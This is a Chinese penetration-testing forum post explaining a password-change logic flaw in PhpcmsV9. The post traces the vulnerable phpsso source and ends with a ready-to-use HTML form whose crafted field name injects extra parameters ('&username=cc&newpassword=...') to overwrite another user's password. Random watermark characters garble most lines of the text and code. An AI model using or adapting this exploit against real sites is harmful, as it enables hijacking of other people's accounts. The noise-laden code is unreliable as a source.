中国网络渗透测试联盟

标题: PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发 [打印本页]
作者: admin    时间: 2013-2-23 14:46
标题: PhpcmsV9 任意用户密码修改逻辑漏洞 2013年贺岁第三发
提到的通行证的代码:6 J- W4 |1 O0 o2 [, o; p2 r

7 t# l: c  K, z6 N+ Z! Q& l; T) n- t: ]( y" B  L) ~
parse_str(sys_auth($_POST['data'], 'DECODE', $this->applist[$this->appid]['authkey']), $this->data);
  i. @# v" |' X8 A# w7 L3 D* ~' X, u1 H' q* q
在phpsso_server/phpcms/modules/phpsso/classes/phpsso.class.php中。/ {2 J5 I" t! i: V/ T9 }7 m
& F! {% D1 T# b( `: N$ y8 W/ U
我把它留给了你们。0 k7 d; X8 {; }. A2 Q: ^
不知道你们发现了它没有。. U3 d: N8 s9 ~7 ^+ q  Z: j& |; Q8 `

7 y/ G7 s" u( d+ c0 }; Z+ t我们知道parse_str类似将http请求转换成php变量的函数,所以,也像http请求在php的环境下一样,如果提交?a=sss&a=aaa,那么a的结果会是aaa,不是sss。
; T! u: y# d# ?; r+ H* c9 |9 G2 ]' p) u
所以我们知道这个函数有一个问题了,如果后面提交一个内容,它会覆盖前面的。7 z2 j; j% S2 Z  E7 I
2 ^# I7 x; z! t. I  e3 M
也就是1 Q2 Q6 V( Y7 k# v

+ \! j8 c- j6 A$ Ausername=zhangsan&username=lisi的话,那么用户名就不是zhangsan了。( y+ {) a# }: z& K" n" w
5 d3 p& Q% `+ d0 s# S/ A5 Z; p
要构造这样的请求,我们还是要回到通行证的client看看,我们有没有这样的机会。# E" `& V5 J5 I: E

- f. ^8 ?+ x5 S% d* y/ j5 y. B. G7 R9 [; g2 a+ |
其实我们有这样的机会,看看代码,如下:
8 ?; I% A% k2 F) g7 m5 R# |; j" E( S- T) D. d9 g! \
7 s4 a/ b! e4 s# v1 m- n9 r% a/ G$ Z
public function auth_data($data) {
1 L0 J5 `1 H* V7 ^& k0 @! R  G6 \                $s = $sep = '';
( v4 G. W% a$ B- a                foreach($data as $k => $v) {8 p# H4 |7 X/ N" k0 o0 O- }
                        if(is_array($v)) {
/ [* ?0 P' `, s. K- a                                $s2 = $sep2 = '';
3 {9 G3 K" Z- ~( X5 i                                foreach($v as $k2 => $v2) {4 O0 U3 y7 G0 [# f7 `
                                                $s2 .= "$sep2{$k}[$k2]=".$this->_ps_stripslashes($v2);6 N  C: k: N: e0 J" [4 q: w
                                        $sep2 = '&';! Z! b5 |8 s; L) l
                                }
) ]) J+ W% ~; q( u' F' h                                $s .= $sep.$s2;0 B0 O5 I$ v# H# q3 l
                        } else {
* \3 k1 b6 g& w. r) z                                $s .= "$sep$k=".$this->_ps_stripslashes($v);, ?2 K# @  n) W2 h& A
                        }* d& |! V3 d( I* Q  B* t# }
                        $sep = '&';
; _2 e, q5 x. Z" E$ @                }$ H. I- ]; O8 o; X. g. B; N
' h: i5 X3 h# ]2 O/ v# I" e
                $auth_s = 'v='.$this->ps_vsersion.'&appid='.APPID.'&data='.urlencode($this->sys_auth($s));
0 ^, J6 c. E4 D& @8 b  x0 |& ^/ L                return $auth_s;+ n% F1 }5 o( i0 b8 e5 Y& n
        }7 h0 G' r& h! X1 u
+ |0 t4 v4 w$ w+ f$ N
可能我没说明白,对,传递进来的数组的key是可控的。如果我的key里包含[]&这样三个字符的话,那么我就能重写这样的东西。8 n2 [) o7 k5 G! j' [2 {

3 x% j) w. M, E; Q3 i0 j举个例子
5 ^" F+ w3 M  G" B
- h* l) C) y- \1 T$a[aaa=a&bbb] = 'a';: e% g3 v& D1 l; ^. o- v* A
# p4 A* p  M& t8 D3 s( x
会变成aaa=a&bbb=a3 M! ]- ~# O2 n4 ]

8 ~* j( t4 j5 s2 `明白了么,对,就是通过没有注意到的key,我们可以构造出多余的参数来。
& H" K% @* u9 Z. @
) s* J& E1 g2 s8 b5 @* w( @这个时候,我们可以再去看一个函数。4 M& f( \6 Y6 Z' H, U$ X
; D+ d, ]8 p! b( T1 ]5 {6 r
就在这个文件内:
* v1 ~! M- B; u7 d$ f3 s
- r7 @3 ^4 F1 }: e% \' N+ ]
8 o. l& U4 y3 M7 B7 R8 Dpublic function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='') {
; ~. `) U3 P2 k  z; N7 D8 ?                if($email && !$this->_is_email($email)) {! i6 t& Z" p$ A
                        return -4;( B/ T" {% b- E. ^+ L! d4 P
                }( m4 M" [- O6 u6 s$ e+ i+ m
                return $this->_ps_send('edit', array('username'=>$username, 'password'=>$password, 'newpassword'=>$newpassword, 'email'=>$email, 'uid'=>$uid, 'random'=>$random));
2 v; ?3 K; j: ^) L  V- n$ {        }" w7 C7 F8 T$ \% F5 L

# R4 q) D/ D+ s% I& y这是向通行证发了这样一个请求。' Z, a+ X6 A2 y  }4 W3 ?
3 U3 A  [; @! H
我们再跟到通信证代码里去看看,就会有所发现。
. L5 _1 q$ z7 g% t0 i$ u: N7 A2 v/ ]; a

6 P6 a* J" G  r' a. q3 }5 D6 w8 F8 npublic function edit() {
- M2 a" k' \+ a" W) J& U% h6 z//能省就省,太长了不是吗?
, _1 C2 S5 @8 _& G1 n( W5 L% `$ r) Y7 y6 i2 u: e( _! J- ]* a
if($this->username) {; k1 W6 d7 R; _  O% F
//如果提交了用户名,则按照用户名修改记录,反之,按照uid来修改记录。: ?/ p7 c8 i& U9 S
                                $res = $this->db->update($data, array('username'=>$this->username));
% U: L: d) k- F% i                        } else {
1 E+ a1 n* d& J                                file_put_contents('typeb.txt',print_r($data,1).$this->uid);
; U. s: c5 {% X( E5 Q/ {. e* W                                $res = $this->db->update($data, array('uid'=>$this->uid));
( j+ b; ]8 ~: U! @" }% g9 ]                        }& \, [, h" c. P3 z, u

2 y- o3 h8 F& y1 @4 I好,我们知道了,如果提交了用户名,就会按照用户名来修改记录,不然就按照uid,我们看看函数结构:
7 \( E4 x! k2 R! z9 z1 I; J
1 S+ u( \/ `1 I- L/ R" {public function ps_member_edit($username, $email, $password='', $newpassword='', $uid='', $random='')
4 y8 A/ m5 t0 X1 z1 s+ ^" S6 I1 F
, U2 y0 n- n9 k3 ~% r0 y, W3 v很好,uid要是无法控制的话,后面只剩下一个random了,但是username就在第一个,只要email,password,newpassword,有任何一个可以控制,就可以修改密码了。
0 W9 Q7 v' L: S8 Q# {4 L7 X' Y' w4 ?
我当然找到了:
( u( H9 w# C! i& h4 |phpcms9/phpcms/modules/member/index.php
: G& m2 k- j0 {4 \9 v1 O$ J3 r* V! l. B! @% i! {
$res = $this->client->ps_member_edit('', $email, $_POST['info']['password'], $_POST['info']['newpassword'], $this->memberinfo['phpssouid'], $this->memberinfo['encrypt']);( I& b5 o8 W' F4 }+ Y
5 z3 S+ h1 Q" Q% N( ~3 s
然后就没有然后了。, x6 Z1 V1 K9 w3 @
% L$ V1 u0 g* ~- m) \
<form method="post" action="http://localhost/phpcms9/index.php?m=member&c=index&a=account_manage_password&t=1" id="myform" name="myform">/ E) `5 D1 o7 V& w
                                <table width="100%" cellspacing="0" class="table_form">
3 c! D" N4 m+ |$ M  h* g5 Q                                        <tr>1 ]7 h9 M! @' J5 j( h2 o/ C3 C
                                                <th width="80">邮箱:</th>        
; Q9 H* [7 d% p; W- M+ @                                                <td><input name="info[email]" type="text" id="email" size="30" value="jj@jj.com" class="input-text"></td>* L2 \  n5 V; j) ^# Y
                                        </tr>
- w" v- ~. K7 j8 G; B                                        <tr>
2 W- V9 }; j' {3 l$ [                                                <th width="80">原密码:</th>        ' _! U: _1 s, L$ Y* C: p
                                                <td><input name="info[password]" type="password" id="password" size="30" value="111111" class="input-text"></td>
9 U! p# G) U9 _0 f/ q                                        </tr>3 z( g5 y+ ~! j; ^
                                        <tr>! c: i% s$ U1 I, s8 ~0 D4 ?3 D- E
                                                <th>新密码:</th>6 |3 ?: A# Q+ k# o7 [0 c9 o
                                                <td><input name="info[newpassword][%5D=aaa%5D%5B&username=cc&newpassword=aaaaaa&]" type="password" id="newpassword" size="30" value="" class="input-text"></td>
- i2 X' u# w" E                                        </tr>1 Q8 j; h- K; y( |& ^& H9 i( z
                                        <th></th>
7 k: }7 ^# c$ v, X                                        <td><input name="dosubmit" type="submit" id="dosubmit" value="提交" class="button"></td>5 O% i7 {: p" s9 f& B& `
                                        </tr>
2 q+ k0 N& h! D$ S7 A  `                                </table>
  U  E% L5 o! l) e* f8 J8 ^% D- i! D
                                9 w2 N, p# j, y
                        </form>
/ I% w/ A4 ^* n/ n7 H  J



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2